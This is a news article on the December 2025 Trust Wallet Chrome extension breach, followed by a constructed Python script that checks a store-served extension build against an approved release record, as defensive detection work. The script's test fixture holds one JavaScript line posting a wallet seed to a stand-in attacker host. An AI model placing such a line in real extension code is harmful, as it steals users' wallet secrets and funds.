Trust Wallet hack drains $7 million from nearly 2,600 crypto wallets
Kirsten Peremore
Dec 30, 2025 10:15:46 AM
On December 24, 2025, Trust Wallet, a popular cryptocurrency wallet acquired by Binance in 2018 but operating independently, suffered a major security breach that resulted in the theft of approximately $7 million from nearly 2,600 wallets.
What happened
The attack was delivered through version 2.68.0 of Trust Wallet’s Chrome extension, which contained malicious JavaScript that exfiltrated sensitive wallet data to an attacker-controlled domain. The version passed the Chrome Web Store’s review and went live on December 24, 2025.
The breach immediately put thousands of cryptocurrency users at risk, as the attackers were able to drain funds from wallets holding Bitcoin, Ethereum, Solana, and thousands of other digital tokens. In response, Trust Wallet released version 2.69 of the Chrome extension, blocked all release APIs for two weeks, and reported the malicious exfiltration domain to NiceNIC, which promptly suspended it.
Despite these actions, the attackers launched a follow-on phishing campaign using a fraudulent Trust Wallet-branded website, attempting to trick users into revealing their wallet recovery seed phrases under the guise of a security update. By December 29, 2025, Trust Wallet had confirmed that 2,596 wallet addresses were affected and that over 5,000 claims had been submitted for reimbursement, prompting the company to carefully verify ownership to ensure funds were returned to legitimate victims. Trust Wallet warned users not to share private keys, seed phrases, or passwords and to only rely on official communication channels.
Why was the malicious extension approved
According to CEO Eowyn Chen on X, the compromised extension “was NOT released through our internal manual process,” meaning the internal checks designed to catch unauthorized or malicious code never ran on it. Trust Wallet’s working hypothesis, still under investigation, is that the attackers used a leaked Chrome Web Store API key to submit the version directly, outside the company’s release pipeline.
The Chrome Web Store’s review examines the package that is uploaded, not who decided to upload it: whoever holds a developer’s publishing credential is, from the store’s perspective, the developer. Its automated and procedural checks catch many common threats but can miss a sophisticated submission that looks legitimate and triggers no known malicious signatures. A leaked publishing credential therefore turns the store itself into the delivery channel, and the only control left is whatever the developer does to compare what the store serves against what it actually approved.
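One way to close that gap, independent of who holds the Web Store credential, is a release record: the build that the internal process approved is hashed and recorded, and any version later observed in the store is checked against that record before users are told it is genuine. The Python below is an added example written for this article, not Trust Wallet’s code or anything from its repository. The two-file extension, the release record, the version numbers, the `seed` variable, and the allowlisted host `api.example-wallet.test` are all constructed assumptions; the host extraction is a plain URL-literal scan of the JavaScript, which is enough to surface a new exfiltration endpoint but is not a substitute for a full review.

```python
import hashlib
import json
import re

# Constructed: a tiny unpacked extension as {path: bytes}, as the internal
# release process approved it. Names and contents are hypothetical.
APPROVED_BUILD = {
    "manifest.json": json.dumps({
        "name": "Example Wallet", "version": "2.67.0",
        "host_permissions": ["https://api.example-wallet.test/*"],
    }).encode(),
    "background.js": b"fetch('https://api.example-wallet.test/balances');\n",
}

# Constructed: what is later observed in the store. A version bump the
# release process never saw, plus an extra call that posts the seed elsewhere.
STORE_BUILD = {
    "manifest.json": json.dumps({
        "name": "Example Wallet", "version": "2.68.0",
        "host_permissions": ["https://api.example-wallet.test/*", "<all_urls>"],
    }).encode(),
    "background.js": (
        b"fetch('https://api.example-wallet.test/balances');\n"
        b"fetch('https://collector.attacker.test/u', {method: 'POST', body: seed});\n"
    ),
}

# Hypothetical allowlist of hosts the extension is permitted to talk to.
ALLOWED_HOSTS = {"api.example-wallet.test"}

URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def file_digests(files):
    """SHA-256 of every file in the build, keyed by path."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def release_record(files):
    """What the internal release process signs off on: version plus per-file digests."""
    manifest = json.loads(files["manifest.json"])
    return {"version": manifest["version"], "digests": file_digests(files)}


def external_hosts(files):
    """Every host named in a URL literal inside any .js file of the build."""
    hosts = set()
    for path, data in files.items():
        if path.endswith(".js"):
            hosts.update(m.decode() for m in URL_RE.findall(data))
    return hosts


def audit_store_build(store_files, record, allowed_hosts):
    """Compare a build seen in the store against the approved release record.

    Returns a list of findings; an empty list means the store build is exactly
    the approved one and talks only to allowlisted hosts.
    """
    findings = []
    observed = release_record(store_files)
    if observed["version"] != record["version"]:
        findings.append(
            f"version {observed['version']} was never approved "
            f"(record has {record['version']})"
        )
    for path, digest in observed["digests"].items():
        if record["digests"].get(path) != digest:
            findings.append(f"{path}: digest differs from approved build")
    for path in record["digests"].keys() - observed["digests"].keys():
        findings.append(f"{path}: missing from store build")
    for host in sorted(external_hosts(store_files) - allowed_hosts):
        findings.append(f"unexpected network host {host} in extension JavaScript")
    return findings


if __name__ == "__main__":
    record = release_record(APPROVED_BUILD)
    for finding in audit_store_build(STORE_BUILD, record, ALLOWED_HOSTS):
        print("FINDING:", finding)
```

Run periodically against the package the store actually serves (unpacked CRX contents), the check reports the unapproved version, both changed files, and the new host in one pass. The record must be produced by the same pipeline that does the manual review, so that a submission made with a stolen credential can never also update the record it is compared against.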
What was said
In the post on X, Chen wrote, “A working hypothesis (still under investigation):
The hacker used a leaked Chrome Web Store API key to submit the malicious extension version v2.68. This successfully passed Chrome Web Store's review and was released on Dec 24, 2025 at 12:32 UTC.”
Why it matters
Although it occurred outside a traditional healthcare setting, the Trust Wallet breach follows a stream of cyber incidents seen throughout 2025, including the Episource ransomware attack and the DaVita ransomware incident.
In the Episource case, attackers gained access to a healthcare IT vendor between January 27 and February 6, 2025, exposing medical coding data, insurance information, and personal identifiers tied to more than 5.4 million patients and providers. DaVita experienced a similar outcome beginning March 24, 2025, when ransomware disrupted operations and exposed sensitive data for approximately 2.69 million individuals. The Trust Wallet incident used a different mechanism, a leaked Chrome Web Store API key rather than ransomware, but reached the same end: attackers published a malicious browser extension update that bypassed internal controls and quietly harvested wallet credentials at scale through a channel users had every reason to trust.
FAQs
What is a cyberattack?
A cyberattack is an intentional attempt to access, damage, or steal data from computer systems, networks, or devices.
Why do cyberattacks target vendors and third parties?
Attackers often exploit weaker security in vendors or third-party systems to gain indirect access to sensitive data.
Why are phishing campaigns effective?
Phishing tricks individuals into revealing credentials or sensitive information by posing as trusted entities, exploiting human trust.
What are supply-chain cyberattacks?
Supply-chain attacks compromise software or hardware providers to indirectly infiltrate multiple organizations relying on those products.